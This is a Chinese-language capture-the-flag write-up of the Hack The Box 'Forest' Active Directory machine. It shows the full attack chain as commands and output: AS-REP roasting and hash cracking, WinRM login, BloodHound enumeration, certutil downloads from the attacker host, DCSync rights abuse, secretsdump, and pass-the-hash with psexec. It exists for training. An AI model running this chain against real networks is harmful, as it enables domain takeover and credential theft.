前言#

這台是 Hack The Box 的 Forest，難度是 Easy，也是 AD 101 的第一台

使用到的技巧：

1. ldapsearch
2. john crack hash
3. SharpHound + BloodHound CE
4. DCSync

Attacker: 10.10.16.3
Target: 10.10.10.161

Recon#

1. nmap

sudo nmap -sV -sC 10.10.10.161

PORT      STATE SERVICE      REASON          VERSION
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-22 05:29:52Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49983/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5597/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51508/udp): CLEAN (Timeout)
|   Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-04-21T22:30:47-07:00
| smb2-time: 
|   date: 2024-04-22T05:30:48
|_  start_date: 2024-04-22T05:05:05
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h22m36s, deviation: 4h02m30s, median: 2m35s

可以知道這台是 htb.local 的 Domain Controller
5985 port 也是開的，推測 WinRM 是打開的

2. ldapsearch

3268 port 開了 ldap 用 ldapsearch 輔助

ldapsearch -H ldap://10.10.10.161 -x -s base namingcontexts

-x Simple authentication
-s Scope

namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

接下來用 GetNPUsers

impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request

可以拿到 svc-alfresco 這個 user 的 password hash

$krb5asrep$23$svc-alfresco@HTB.LOCAL:c5415db6bb764e14a48fb634733aa7e7$c0608bb5a59e8c04a8ab26f187fb054e7be2c2c3ba0c533fb757079b471f5a3be620715925c4b6d914b9fe8e65762e4401b2a45b9d88038f78e63a9e5913c99d803737071d073c0c8085b682e6384c6ae7328e8188cb6d2c462b4b0ccc9fb59a260a901c2bd0651436604359f01ca60806567b4923f9df22ed2f2678d200b609f20ea89a1f0f3ec2e7f89c67a5df6e2a6ed55654bd91505b81ad9eb87ed999a8bf29003ed24eeae0b99e4f8d25763bf2031c2d643375a65cd5d9ee4f276bd96bc7e1da3397a366e2ec58f01a7f700a944784939094fae05d2395e4c7838a015afcd39b77c5fe

接下來用 john + rockyou.txt

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

Exploit#

用取得的 credential 嘗試登入

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

成功取得 User Shell

Privilege Escalation#

用 bloodhound 繼續 recon

bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

報錯ㄌ，乖乖到 target 上執行，在那之前先開 neo4j 跟 bloodhound

sudo neo4j console

bloodhound

接下來上傳 SharpHound.exe
https://github.com/BloodHoundAD/SharpHound/releases/tag/v2.3.3

certutil.exe -urlcache -split -f http://10.10.16.3:8000/SharpHound.exe

執行 SharpHound

.\SharpHound.exe -c all

會拿到一個 zip 檔

Evil-WinRM 還是挺好用的，可以直接下 download 傳回攻擊機，不用架 smbserver 傳輸

download 20240423174653_BloodHound.zip

把 zip 檔上傳到 BloodHound

Note: 無法上傳可能是版本問題，建議都用最新版的 BloodHound 跟 SharpHound
最新版 BloodHound 使用方法
(登入時 docker exited 可能是你的 RAM 不夠)

wget https://ghst.ly/getbhce -O docker-compose.yml

docker-compose up -d

在 cypher 搜 domain admin 設成 end node，會列出 path 特別牛

但我不知道 CanPSRemote 怎麼利用 QQ
照著 BloodHound 的提示做會報錯

所以把 CanPSRemote 拔掉，再搜尋一次

WriteDACL 可以做 DCSync 攻擊，這樣路線就蠻明確了

1. 創建一個 user 並加入 EXCHANGE WINDOWS PERMISSIONS group
2. DCsync 攻擊 dump 出 password

創建 user

net user flydragon password123 /add /domain

把剛剛創建的 user 加進 EXCHANGE WINDOWS PERMISSIONS group

net group "EXCHANGE WINDOWS PERMISSIONS" /add flydragon

接下來照著 BloodHound 給的建議做

$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb\flydragon', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

最後一行報錯了，查了一下知道要 import PowerView module
(kali 上已經有了 /usr/share/windows-resources/powersploit/Recon/PowerView.ps1)

certutil.exe -urlcache -split -f http://10.10.16.3:8000/PowerView.ps1

Import-Module .\PowerView.ps1

再送一次這個

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

可以開始 dump password ㄌ！

impacket-secretsdump htb.local/flydragon:password123@10.10.10.161

會有很多個，但重點是 Administrator 的密碼

htblocal\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

拿到 Root Shell

後記#

這台我分兩天才打完，確定是 Easy 嗎 Orz